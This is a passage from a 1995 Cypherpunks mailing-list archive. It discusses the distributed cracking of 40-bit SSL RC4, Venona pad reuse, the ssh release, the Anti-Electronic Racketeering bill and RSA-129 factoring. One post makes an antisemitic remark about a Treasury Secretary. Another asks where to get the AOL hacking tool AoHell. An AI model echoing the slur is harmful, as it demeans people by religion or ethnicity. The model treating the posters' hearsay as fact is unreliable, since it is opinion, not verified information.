(Sean A. Walberg) Date: Wed, 12 Jul 95 13:00:08 PDT Subject: Don't trust the net too much In-Reply-To: Message-ID: On Wed, 12 Jul 1995, Doug Hughes wrote: > Keep in mind that newer planes (767, 757) let you do anything you want > while the plane is in flight (but now while landing or takeoff), so they > probably build better instrumentation and cabin shielding into the planes > these days. If they say keep it off, chances are they have a good reason.. > > If you find categorical evidence to the contrary, I'm sure I would be very > relieved to see it posted here. (rather than wondering if somebody > in one of the 30 rows ahead of me might decide he knows better) > > Disclaimer: I have absolutely no idea what kind of shielding goes into > an airplane nor any knowledge of building practices in the airline industry, > but that should be obvious. ;) In the Canadian CFS (Canada Flight Supplement), a manual distributed to all Canadian pilots and continuously updated, there is a section on this kind of thing. The basic gist of it is that there is no proof that computers and cells cause interference, tests have proved inconclusive, but there is suspicion. Then, of course, is a silly little form that you are supposed to fill out if you ever have such a problem. As for cells, a collegue (with his Commercial rating, was going for an Airline Transport Rating) swore up and down that cells do nothing, and that the only reason there are phones on airplanes is because with a standard cell you can phone just about anywhere locally because of the range an air-ground connection would have a 30,000'. The plane phones are supposed to have some sort of device that uses the local cell and forces you to pay LD charges. Whether it is true or not.... But anyway, aircraft instruments operate in just about all bandwiths (HF, VHF, UHF mainly, with VHF being very popular.) Sean o-------------------o----------------------o-----------------------o | Sean Walberg, | Tech Support | Pas_al, _obol, BASI_, | | sean at escape.ca | escape communication | PostS_ript, T_L... | | Mail for PGP key | 925-4290 | C fills all the holes | o----------------] http://www.escape.ca/~sean [--------------------o From cp at proust.suba.com Wed Jul 12 13:00:15 1995 From: cp at proust.suba.com (alex) Date: Wed, 12 Jul 95 13:00:15 PDT Subject: SSL RC4 challenge In-Reply-To: <199507121722.KAA19834@jobe.shell.portal.com> Message-ID: <199507122003.PAA02843@proust.suba.com> > Here is a challenge to try breaking SSL using the default exportable > encryption mode, 40-bit RC4. It consists of a record of a submission > of form data which was sent to Netscape's electronic shop order form in > "secure" mode. However the data I entered in the form is not my real > name and address. The challenge is to break the encryption and recover > the name and address info I entered in the form and sent securely to > Netscape. Can't we hold off a few weeks on this, so that we can all short the stock once it's been offered? From hardin at cyberspace.com Wed Jul 12 13:13:15 1995 From: hardin at cyberspace.com (hardin at cyberspace.com) Date: Wed, 12 Jul 95 13:13:15 PDT Subject: QED_jak Message-ID: <9507122009.AA0581@localhost> Perry Metzger writes: > > > John Young writes: > > "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses > > Clues That Led to Code-Breaking." > > [snip] > The reports claimed the spys were using one time pads in some flawed > manner, but did not explain very well what the problem was. Does > anyone out there know? > > .pm > > > A real good book with a fair amount of details is Peter Wright's great book "Spycatcher". The clueless media concentrated on Wright's allegation that Sir Roger Hollis, head of MI5 was a Soviet mole or the "5th Man" of the Philby, Burgess, Maclean & Blunt spyring. Now Wright may have been in Jesus Angleton's psychotic "wilderness of mirrors" too long, but he did a lot of bugging & stuff w/ GCHQ & he spends a great deal of his book talking about precisely the Venona decrypts. Briefly there was some reuse of "one time pads". He gives a fair amount of detail, & I suspect this is why HRM Govt. was so displeased, the supposed "embarrassment" of the allegations against long dead Sir Roger being just a cover story & much easier for the tabloids & general public to understand. tjh This is 1/713 of PGP262i DOS Executable Zipfile UUE'd Violate the Un-Constitutional ITAR Today! Get YOUR chunk @ web site below. ------------------ PGP.ZIP Part [005/713] ------------------- M at UIXP9EW\".^Q0XL1SO8"^*_O:U-=H(P&2,1A6YHB?KP@@H2/)$+P at -"($GRAT$8246(Q:3 ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From Rolf.Michelsen at delab.sintef.no Wed Jul 12 13:47:21 1995 From: Rolf.Michelsen at delab.sintef.no (Rolf Michelsen) Date: Wed, 12 Jul 95 13:47:21 PDT Subject: QED_jak In-Reply-To: <9507121445.AA10531@snark.imsi.com> Message-ID: On Wed, 12 Jul 1995, Perry E. Metzger wrote: > The reports claimed the spys were using one time pads in some flawed > manner, but did not explain very well what the problem was. Does > anyone out there know? According to Christopher Andrew in "KGB: The Inside Story" the Russians started to reuse one time pads near the end of the war due to the sheer volume of secret information being sent. This was discovered by Meredith Gardener of the ASA in 1948 and later exploited to crack these messages. The operation goes under the names of Venona and Bride. The latter is used in Peter Wright's book "The Spycatcher's Encyclopedia of Espionage". -- Rolf Rolf.Michelsen at delab.sintef.no "Nostalgia isn't what it http://www.delab.sintef.no/~rolfm/ used to be..." From sdw at lig.net Wed Jul 12 13:54:24 1995 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 12 Jul 95 13:54:24 PDT Subject: ANNOUNCEMENT: Ssh (Secure Shell) remote login program In-Reply-To: <199507121916.WAA06662@shadows.cs.hut.fi> Message-ID: > > > ssh, while an obvious name, already collides with a nice shar decoder and > > a different kind of secure shell from CFS. > > Ssh has already been registered with IANA (Internet Assigned Numbers > Authority) as the name of the service. I would rather not change it > without a compelling reason. It is also easy to obtain from rsh by > replacing the r by s (which also makes for scp, sshd, and in future > maybe also sdist). It is my understanding that CFS is in rather > limited use (especially outside the US), and the ssh shar extractor is > not widely used either (neither can be found from the archie database > at archie.funet.fi). IETF has a thing called Site Security Handbook > that they abbreviate SSH, but it is probably sufficiently different > not to be confused. I agree as the collisions aren't too bad (except in my /usr/local/bin...). > > Of course support for S/Key and tokens/hand held authenticators would be > > useful additions for some situations (although inferior to RSA...). > > True. > > The agent protocol can currently be used to forward a connection to > any program (which can mean device) that can perform RSA > authentication. New authentication methods can be compatibly added > later. > > S/Key can be used by making skeysh you login shell. Then you will > first be asked for a normal password (if any), and then for the > one-time password. I did not want to incorporate skey functionality > directly into the software, because it is not clear to me if the > arrangements in use (file names, formats, algorithms) have stabilized > yet. Also, there is less need for skey as no passwords are > transmitted in the clear. > > > Integration with TCP/NFS and/or client-server CFS would be fantastic. > > (One local CFS server acting as a secure client over tcp to a remote > > CFS server.) > > Remote encrypted mount of an encrypted partition... > > Maybe, *maybe*, TCP/IP port forwarding could be used for this? (I > don't know what CFS does because I have never seen CFS.) I was actually contemplating a modification to CFS to support a tunneled TCP based NFS related operation. CFS, like other specialized NFS servers, talks to NFS clients like the normal NFS server, but runs on a different RPC port (so you can run several types of NFS servers). CFS encrypts directories that can be attached and detached without changing the NFS mount. It occurred to me that it wouldn't be too tough to have one CFSD open a TCP/socket connection to another CFSD and pass file access requests instead of implementing them locally. The encryption of the ssh link and the on disk encryption of CFSD should be a good combination. I've been compiling under Linux and have had a number of autoconfiguration errors. I'll produce a simple-minded patch shortly. (Thinks I'm cross-compiling, have some include files I don't, don't have waitpid/wait3, collision with stdc crypt/random defs, etc.) > Tatu sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From samman at CS.YALE.EDU Wed Jul 12 13:57:22 1995 From: samman at CS.YALE.EDU (Rev. Ben) Date: Wed, 12 Jul 95 13:57:22 PDT Subject: Q E D_j a k In-Reply-To: <199507121947.MAA28807@ix5.ix.netcom.com> Message-ID: On Wed, 12 Jul 1995, Bill Stewart wrote: > (Yes, I know one-time-pads are provably good crypto, but they also > depend on the security of key distribution and one-time use, > which apparently broke down here. And the CIA's pretty good at > chasing the guy with briefcases of code material handcuffed to their arms.) Actually this stuff is most likely shipped under diplomatic pouch. ____ Ben Samman..............................................samman at cs.yale.edu I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND! For information Email: zldf at clark.net http://www.netresponse.com/zldf Ben. From perry at imsi.com Wed Jul 12 14:06:42 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 12 Jul 95 14:06:42 PDT Subject: ANNOUNCEMENT: Ssh (Secure Shell) remote login program In-Reply-To: Message-ID: <9507122105.AA11297@snark.imsi.com> Stephen D. Williams writes: > It occurred to me that it wouldn't be too tough to have one CFSD > open a TCP/socket connection to another CFSD and pass file access > requests instead of implementing them locally. The encryption > of the ssh link and the on disk encryption of CFSD should be a > good combination. The whole point of CFS was that you could mount remote devices that were encrypted and decrypt them locally. CFS acts like a scrim over existing file systems. If the remote machine has your keys on it you've reduced security and, seemingly to me, gained very little. Now, what *would* be really neat would be an implementation of CFS in kernel under 4.4lite using the stacked vnode architecture. It would probably be fairly simple to do it, and you wouldn't have any context switches or the like when cfs'ing... Perry From ylo at cs.hut.fi Wed Jul 12 14:17:00 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Wed, 12 Jul 95 14:17:00 PDT Subject: ANNOUNCEMENT: Ssh (Secure Shell) remote login program In-Reply-To: Message-ID: <199507122116.AAA06846@shadows.cs.hut.fi> > I've been compiling under Linux and have had a number of autoconfiguration > errors. I'll produce a simple-minded patch shortly. > (Thinks I'm cross-compiling, have some include files I don't, don't > have waitpid/wait3, collision with stdc crypt/random defs, etc.) I last configured and compiled ssh on Linux yesterday and had no problems. I have slackware 2.2.0.1, kernel 1.2.8, gcc-2.7.0. Please include version numbers in your report. Tatu From pgf at tyrell.net Wed Jul 12 14:20:37 1995 From: pgf at tyrell.net (Phil Fraering) Date: Wed, 12 Jul 95 14:20:37 PDT Subject: FW: Edupage 7/9/95 (fwd) In-Reply-To: <9507121233.AA15475@elysion.iaks.ira.uka.de> Message-ID: <199507122115.AA03497@tyrell.net> BTW, I read some of the follow-up messages and it turns out the pages in question _weren't_ in the United States. They were in Metarie! I didn't mean to sound critical, BTW; it's just that after the "porn is only a click away" school of journalism that's been going on in _this_ country (loosely defined enough to include Louisiana). Phil From bdolan at use.usit.net Wed Jul 12 14:23:28 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Wed, 12 Jul 95 14:23:28 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: ---------- Forwarded message ---------- Date: Wed, 12 Jul 1995 15:28:25 -0400 Subject: Anti-Electronic Racketeering Act of 1995 On June 27, Sen. Grassley introduced extensive criminal amendments to the federal racketeering act. S. 974, the "Anti-Electronic Racketeering Act of 1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute), 18 USC 1030A (new section on computer crime), 18 USC 2515, 2516 (wiretapping), and 42 USC 2000aa (Privacy Protection Act). This proposed legislation is Very Bad. It would make all encryption software posted to computer networks that are accessible to foreigners illegal *regardless of whether the NSA has classified the software as a munition!!!* Here's the language: "Sec. 1030A. Racketeering-related crimes involving computers "(a) It shall be unlawful-- . . . "(2) to distribute computer software that encodes or encrypts electronic or digital communications to computer networks that the person distributing knows, or reasonably should know, is accessible to foreign nationals and foreign governments, regardless of whether such software has been designated nonexportable." From hayden at krypton.mankato.msus.edu Wed Jul 12 14:46:05 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Wed, 12 Jul 95 14:46:05 PDT Subject: Dr. Seuss, Technical Writer In-Reply-To: <199507121756.KAA04759@netcom5.netcom.com> Message-ID: Thanks so much for lightening my day. Submit it to rec.humour.funny. ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From rah at shipwright.com Wed Jul 12 14:51:31 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 12 Jul 95 14:51:31 PDT Subject: [rah@shipwright.com: Re: digital monies] Message-ID: Steve, I'm forwarding this to cypherpunks, where this posting originated. Always ready to set the record straight. By the way, could I have an email copy of your original posting/publicity material for this, I'm curious about where it was announced to the net. Tighten up my links to the straight dope, etc. Thanks! Bob Hettinga >Bob, > >Carl Ellison at TIS brought this to my attention. We'll provide you with a >lengthier response in a bit, but let me comment briefly that the following >contains a number of inaccuracies. Two of particular note: Citibank is not >a principal in CyberCash, and the vaporware footnote is peculiar because >our system has been operational since early April and the client software, >which runs as a "viewer" with a number of browsers, is available from our >web site for downloading around the world. > >Steve > > >>CyberCash >>The last I heard from these guys, a "consortium" of various heavies like RSA >> and I believe Citibank even, was an article plastered all over the >>Marketing section of the Wall Street Journal last fall. To my knowlege they >>haven't come up for air. My memory of 'consortia' like this one, and >>Citicorp in particular (who was trying to reverse engineer Chaum's Digicash >>patent last time I looked), leads me to believe this dog won't hunt, or at >>least not until the coon's already been treed, anyway. Cf: Citi's Quotron >>boondoggle. > >-------------------- >Steve Crocker >CyberCash, Inc., Suite 430 Work: +1 703 620 4200 >2100 Reston Parkway Fax: +1 703 620 4215 >Reston, VA 22091 crocker at cybercash.com ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From cme at TIS.COM Wed Jul 12 15:06:59 1995 From: cme at TIS.COM (Carl Ellison) Date: Wed, 12 Jul 95 15:06:59 PDT Subject: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto In-Reply-To: <199507122014.NAA19181@comsec.com> Message-ID: <9507122202.AA13704@tis.com> If I remember correctly from "Spycatcher", the Soviets misused the one time pad allowing the Verona breaks, by using it twice, not by making slightly weak rannos. Of course, in this business, anything you read/hear could be a cover story. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme/home.html | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +----------------------------------------------------------- Jean Ellison -+ From foodie at netcom.com Wed Jul 12 15:09:51 1995 From: foodie at netcom.com (Bryna Bank/Jamie Lawrence) Date: Wed, 12 Jul 95 15:09:51 PDT Subject: Anti-Racketeering Act Message-ID: <199507122200.PAA23874@netcom14.netcom.com> > "(a) It shall be unlawful-- > > . . . > > "(2) to distribute computer software that encodes or encrypts > electronic or digital communications to computer networks that the > person distributing knows, or reasonably should know, is accessible to > foreign nationals and foreign governments, regardless of whether such > software has been designated nonexportable." Oh no - I can already see the T-shirt ideas congealing in people's minds: Lbh�er Ohfgrq in big block letters. -j -- On the internet, nobody knows you're a deity. __________________________________________________________________________ Jamie Lawrence and Bryna Bank From alanh at infi.net Wed Jul 12 15:20:52 1995 From: alanh at infi.net (Alan Horowitz) Date: Wed, 12 Jul 95 15:20:52 PDT Subject: RACIST MILITIA: ATF In-Reply-To: Message-ID: Has anyone got the address of the Southern Poverty Law Center? Wonder if they will go apeshit putting out press releases against the racist activities happening during the watch of TReasury Secretary Robert Rubin, a Nice Liberal Jewish Boy..... Alan Horowitz alanh at infi.net From bal at martigny.ai.mit.edu Wed Jul 12 15:21:13 1995 From: bal at martigny.ai.mit.edu (Brian A. LaMacchia) Date: Wed, 12 Jul 95 15:21:13 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: Message-ID: <9507122221.AA24506@toad.com> Date: Wed, 12 Jul 1995 15:28:25 -0400 Subject: Anti-Electronic Racketeering Act of 1995 On June 27, Sen. Grassley introduced extensive criminal amendments to the federal racketeering act. S. 974, the "Anti-Electronic Racketeering Act of 1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute), 18 USC 1030A (new section on computer crime), 18 USC 2515, 2516 (wiretapping), and 42 USC 2000aa (Privacy Protection Act). This proposed legislation is Very Bad. It would make all encryption software posted to computer networks that are accessible to foreigners illegal *regardless of whether the NSA has classified the software as a munition!!!* Here's the language: "Sec. 1030A. Racketeering-related crimes involving computers "(a) It shall be unlawful-- . . . "(2) to distribute computer software that encodes or encrypts electronic or digital communications to computer networks that the person distributing knows, or reasonably should know, is accessible to foreign nationals and foreign governments, regardless of whether such software has been designated nonexportable." It's much worse than this. Look at the definition of "predicate act": `(b) For purposes of this section, each act of distributing software is considered a separate predicate act. Each instance in which nonexportable software is accessed by a foreign government, an agent of a foreign government, a foreign national, or an agent of a foreign national, shall be considered as a separate predicate act. Now, since the bill also makes 1030A violations "racketeering activities", all you need are two predicate acts and RICO comes into play. Finally, we begin to see the attack on all forms of un-escrowed encryption. The bill provides an affirmable defense of giving the keys to the government ahead of time! `(c) It shall be an affirmative defense to prosecution under this section that the software at issue used a universal decoding device or program that was provided to the Department of Justice prior to the distribution.'. There are also some nice surprises related to wiretapping evidence (would allow the gov't. to use the fruits of an illegal wiretap conducted by a third party if the government didn't know about the wiretap) and the Privacy Protection Act. Get a copy of this bill from: ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP and read it. --bal From sdw at lig.net Wed Jul 12 16:14:04 1995 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 12 Jul 95 16:14:04 PDT Subject: ANNOUNCEMENT: Ssh (Secure Shell) remote login program In-Reply-To: <9507122105.AA11297@snark.imsi.com> Message-ID: > > > Stephen D. Williams writes: > > It occurred to me that it wouldn't be too tough to have one CFSD > > open a TCP/socket connection to another CFSD and pass file access > > requests instead of implementing them locally. The encryption > > of the ssh link and the on disk encryption of CFSD should be a > > good combination. > > The whole point of CFS was that you could mount remote devices that > were encrypted and decrypt them locally. CFS acts like a scrim over > existing file systems. If the remote machine has your keys on it > you've reduced security and, seemingly to me, gained very little. > > Now, what *would* be really neat would be an implementation of CFS in > kernel under 4.4lite using the stacked vnode architecture. It would > probably be fairly simple to do it, and you wouldn't have any context > switches or the like when cfs'ing... > > Perry That's true. I was thinking in terms of traversing firewalls in a safe fashion rather than where normal SUN/RPC NFS is available. For this, using CFS and SSH together seems appropriate. sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From jya at pipeline.com Wed Jul 12 16:23:57 1995 From: jya at pipeline.com (John Young) Date: Wed, 12 Jul 95 16:23:57 PDT Subject: RACIST MILITIA: ATF Message-ID: <199507122323.TAA19392@pipe4.nyc.pipeline.com> Responding to msg by alanh at infi.net (Alan Horowitz) on Wed, 12 Jul 6:21 PM For those in time-zones west of NYC, NBC Lightly News covers the ATF happy campers, and interviews the majordomo, who solemnly meins that he will investigate and do what's right. Another NBC LN item: DOJ is to "re-open" the look at the Ruby Ridge carnage. From rross at sci.dixie.edu Wed Jul 12 16:28:28 1995 From: rross at sci.dixie.edu (Russell Ross) Date: Wed, 12 Jul 95 16:28:28 PDT Subject: RSA129 Project Message-ID: Could someone point me to information about the RSA129 factoring project? I would like the see the programs involved, and learn a little about the coordinating efforts. ----------------------------------------------------------- Russell Ross email: rross at sci.dixie.edu 1260 N 1280 W voice: (801)628-8146 St. George, UT 84770-4953 From cme at TIS.COM Wed Jul 12 16:33:37 1995 From: cme at TIS.COM (Carl Ellison) Date: Wed, 12 Jul 95 16:33:37 PDT Subject: Capt. Midnight decoder badges Message-ID: <9507122330.AA18388@tis.com> 25 13 23 20 26 2 17 13 16 11 12 18 9 12 16 11 13 23 16 7 2 13 9 12 2 5 16 11 4 7 4 25. 11 13 9 15 13 2 5 17 13 4 18 12 16 16 26 7 4? From mab at research.att.com Wed Jul 12 16:36:54 1995 From: mab at research.att.com (Matt Blaze) Date: Wed, 12 Jul 95 16:36:54 PDT Subject: the sound of another shoe dropping... Message-ID: <9507122338.AA06723@merckx.info.att.com> ------- Forwarded Message Forwarded message: >From farber at eff.org Wed Jul 12 16:41:13 1995 Posted-Date: Wed, 12 Jul 1995 15:28:18 -0400 X-Sender: farber at linc.cis.upenn.edu Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Priority: 1 (Highest) Date: Wed, 12 Jul 1995 15:28:25 -0400 From: farber at central.cis.upenn.edu (David Farber) Subject: Anti-Electronic Racketeering Act of 1995 Precedence: list To: interesting-people at eff.org (interesting-people mailing list) X-Proccessed-By: mail2list Date: Wed, 12 Jul 1995 14:00:23 -0400 From: ssteele at eff.org (Shari Steele) Heavy sigh. On June 27, Sen. Grassley introduced extensive criminal amendments to the federal racketeering act. S. 974, the "Anti-Electronic Racketeering Act of 1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute), 18 USC 1030A (new section on computer crime), 18 USC 2515, 2516 (wiretapping), and 42 USC 2000aa (Privacy Protection Act). This proposed legislation is Very Bad. It would make all encryption software posted to computer networks that are accessible to foreigners illegal *regardless of whether the NSA has classified the software as a munition!!!* Here's the language: "Sec. 1030A. Racketeering-related crimes involving computers "(a) It shall be unlawful-- . . . "(2) to distribute computer software that encodes or encrypts electronic or digital communications to computer networks that the person distributing knows, or reasonably should know, is accessible to foreign nationals and foreign governments, regardless of whether such software has been designated nonexportable." I'm up to my ears in analyses that need to be written, but I'll send around something more complete when I'm able to pull it together. Shari ------- End of Forwarded Message From perry at imsi.com Wed Jul 12 16:41:50 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 12 Jul 95 16:41:50 PDT Subject: the sound of another shoe dropping... In-Reply-To: <9507122338.AA06723@merckx.info.att.com> Message-ID: <9507122341.AA11589@snark.imsi.com> > On June 27, Sen. Grassley introduced extensive criminal amendments to the > federal racketeering act. S. 974, the "Anti-Electronic Racketeering Act of > 1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute), > 18 USC 1030A (new section on computer crime), 18 USC 2515, 2516 > (wiretapping), and 42 USC 2000aa (Privacy Protection Act). Needless to say, this must be stopped. This time, it can't be handled via silly petitions. Perry From warlord at MIT.EDU Wed Jul 12 16:53:01 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Wed, 12 Jul 95 16:53:01 PDT Subject: RSA129 Project In-Reply-To: Message-ID: <199507122352.TAA04306@toxicwaste.media.mit.edu> If you look at ftp://toxicwaste.mit.edu/pub/rsa129 you will find a lot of documentation on the RSA-129 project, including the call-to-arms, program distributions, papers, etc. I wouldn't call this the canonical site, but I tried to make available most everything that I could find on the project while it was running and afterwards. Enjoy! -derek From jim at acm.org Wed Jul 12 17:07:01 1995 From: jim at acm.org (Jim Gillogly) Date: Wed, 12 Jul 95 17:07:01 PDT Subject: RSA129 Project In-Reply-To: Message-ID: <199507130006.RAA22366@mycroft.rand.org> > rross at sci.dixie.edu (Russell Ross) writes: > Could someone point me to information about the RSA129 factoring project? > I would like the see the programs involved, and learn a little about the > coordinating efforts. There's a PostScript paper, programs, and coordinating tools at ftp.ox.ac.uk:pub/math/rsa129 Jim Gillogly Highday, 20 Afterlithe S.R. 1995, 00:06 From rah at shipwright.com Wed Jul 12 17:40:12 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 12 Jul 95 17:40:12 PDT Subject: Road trip Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I'm going to be in San Francisco (Walnut Creek, really) Saturday, Sunday, and Monday. Anyone up for a beer? Cheers, Bob Hettinga -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMARo7vgyLN8bw6ZVAQF6ygP/fDnuvdAhGlDWsSMXUIRMuNHYzdZ00cqk Db/Tc2+DuhuEa6GU03AgZY8K9t5r9iua34E68pCxogUz009b1OcjNt6+o+704Z3j 1YY9ijYM8BWNaSp9L2W4nUuWBdIyIWyol/2PjjRVNZEtqtSRQnPEpJ2IHtz9iGov Hf0SqhSZKZs= =+Q3I -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From hayden at krypton.mankato.msus.edu Wed Jul 12 18:16:24 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Wed, 12 Jul 95 18:16:24 PDT Subject: RSA129 Project In-Reply-To: <199507130006.RAA22366@mycroft.rand.org> Message-ID: Speaking of RSA129, we were talking on mn.general about how interesting it would be to try another distributed RSA attack at a larger key (the number of 512-bits was thrown around). Are there currently any plans to attempt another one of these? I'd love to get our MasPAR cracking on something. ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From merzbow at ibm.net Wed Jul 12 18:29:49 1995 From: merzbow at ibm.net (Dan Bailey) Date: Wed, 12 Jul 95 18:29:49 PDT Subject: UNWANTED KEYSPACE Message-ID: <199507130129.AA44622@ibm.net> I allocated way too many keys by getting interrupted (my ISP crashed) then pressing the wrong submit button. Here they are: cd70000000 31 cdf0000000 31 ce70000000 31 cef0000000 31 cf70000000 31 cff0000000 31 d070000000 31 d0f0000000 31 d170000000 31 d1f0000000 31 d270000000 31 d2f0000000 31 d370000000 31 d3f0000000 31 d470000000 31 d4f0000000 31 d570000000 31 d5f0000000 31 d670000000 31 d6f0000000 31 d770000000 31 d7f0000000 31 d870000000 31 d8f0000000 31 d970000000 31 d9f0000000 31 da70000000 31 daf0000000 31 db70000000 31 dbf0000000 31 dc70000000 31 dcf0000000 31 From cman at communities.com Wed Jul 12 19:01:26 1995 From: cman at communities.com (Douglas Barnes) Date: Wed, 12 Jul 95 19:01:26 PDT Subject: AoHell Message-ID: Does anybody know about where to get this? (If this was discussed here during my cypherpunks-viewing hiatus, I apologize). From roger at coelacanth.com Wed Jul 12 19:14:13 1995 From: roger at coelacanth.com (Roger Williams) Date: Wed, 12 Jul 95 19:14:13 PDT Subject: Is there a moderator in your future? In-Reply-To: <9507102137.AA26662@spirit.aud.alcatel.com> Message-ID: In article <9507102137.AA26662 at spirit.aud.alcatel.com> droelke at spirit.aud.alcatel.com (Daniel R. Oelke) writes: > Why is Dyson of EFF enthusiastic about the concept? Because as moderators add value to the vast amount of stuff out there. Why do some people pay to get a restricted subset of the cypherpunks? Because they don't want the massive flow of wide open communications and they *trust* the person giving them the subset. Moderators provide a great service, and it is finially being recognized as such in a monetary way. I think that this is a great thing! I agree that moderated groups are useful at keeping the SNR high, and are a great choice for those who can't or haven't time to set up their own filters. However, they can't solve the problems that the Internet is popularly supposed to have (e.g. no provisions for eliminating parental responsibility). Even supposing that US ISPs are *prohibited by law* from carrying unmoderated Usenet groups, how does this address all of the other services (current and future) that can be carried by the Internet? Sorry, the horse is out of the stable, and the only 99% control option open to the government now is cutting the phone lines at the border. If an individual (e.g. a parent) wants to limit net access for certain services to emasculated resources, perhaps Microsoft Restrict (TM) and Prodigy can provide a desired service. Otherwise, the solution to the problem has to lie closer to home. -- Roger Williams -- Coelacanth Engineering -- Middleborough, Mass #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2% Sa2/d0 Message-ID: On Wed, 12 Jul 1995, alex wrote: > Can't we hold off a few weeks on this, so that we can all short the stock > once it's been offered? Hmm...well, considering we have yet to break the first 40-bit RC4 key (with 87.1 of the keyspace searched), I think it might be a bit early to make financial decisions based on our cracking abilities. -Thomas From anthony at atanda.com Wed Jul 12 19:40:05 1995 From: anthony at atanda.com (Anthony Templer) Date: Wed, 12 Jul 95 19:40:05 PDT Subject: Road trip Message-ID: At 8:40 PM 7/12/95, Robert Hettinga wrote: >I'm going to be in San Francisco (Walnut Creek, really) Saturday, Sunday, >and Monday. > >Anyone up for a beer? > >Cheers, >Bob Hettinga Bob, I've enjoyed your postings and would like to buy you a beer and chat for a while. I'm in Oakland. There's a great pub (30 taps) right around the corner from my house. Or do you have a place in mind in Walnut Creek for the hoisting? Regards, Anthony "We are what we repeatedly do. Excellence, then, is not an act, but a habit." Aristotle From don at cs.byu.edu Wed Jul 12 19:53:26 1995 From: don at cs.byu.edu (Donald M. Kitchen) Date: Wed, 12 Jul 95 19:53:26 PDT Subject: RC4 Message-ID: <199507130301.VAA18401@zeezrom.cs.byu.edu> I was trying to throw a few already wasted CPU cycles to the RC4 bit, but had some problems getting the cypher and plain files. (I can't "save next link", only "save current" which sometimes doesn't work well.) So anyway, I decide to run a 24 bit test run on what I've got, using the "extra allocated" keyspace. It says got it at c70014639. Since I know I'm not lucky enough to pick the 5 seconds worth of CPU time that would work, I think someone better send me (by email thanks, lets not clutter the list) the uue of the cypher and plain. I ran the dos version, BTW, but I'm going to compile under Linux. When we decide _which_ key we're going to crack, I could finagle basically full cpu time on about 10 hp9000's for 6 hours a day. Would that help? ;) Don From wilcoxb at nagina.cs.colorado.edu Wed Jul 12 21:14:37 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Wed, 12 Jul 95 21:14:37 PDT Subject: No Subject Message-ID: <199507130414.WAA15848@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- There was some discussion on c-punks a little while back about exchanging DigiCash cyberbucks for other currencies (namely US$, as I recall). Is there a list or Web page where I can participate in such a market? Thanks. Bryce signatures follow /================--------------- Bryce Wilcox "Pretty Good Privacy" encrypted mail preferred bryce.wilcox at colorado.edu finger for public key ---------------================/ -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBMASWRJCUT4gUihHlAQGSUgP/WvL/OSzFl8l6PH60D1IK9gT/OAhNc9tm 